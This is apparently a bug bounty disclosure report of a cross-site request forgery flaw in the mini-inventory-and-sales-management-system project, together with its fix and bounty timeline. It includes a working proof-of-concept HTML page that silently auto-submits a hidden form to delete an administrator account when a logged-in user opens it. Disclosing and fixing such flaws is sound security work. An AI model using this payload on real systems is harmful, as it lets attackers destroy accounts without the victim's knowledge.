Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Sep 7th 2021


✍️ Description

Attacker is able to delete a administrator accounts if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser(Firefox and Safari)
2.you can check unintentionally you delete an administrator account.


//POC.html
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
     <input type="hidden" name="_aId" value="396" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>

💥 Impact

This vulnerability is capable of forging admin to unintentional delete an account.

💥 Test

Tested on Firefox and safari.

💥 Fix

You should set a CSRF token on this requests.

References

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 3 months ago
Musio
3 months ago

Researcher


hi are you checked this report?

Amir validated this vulnerability 10 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 10 days ago
Amir has been awarded the fix bounty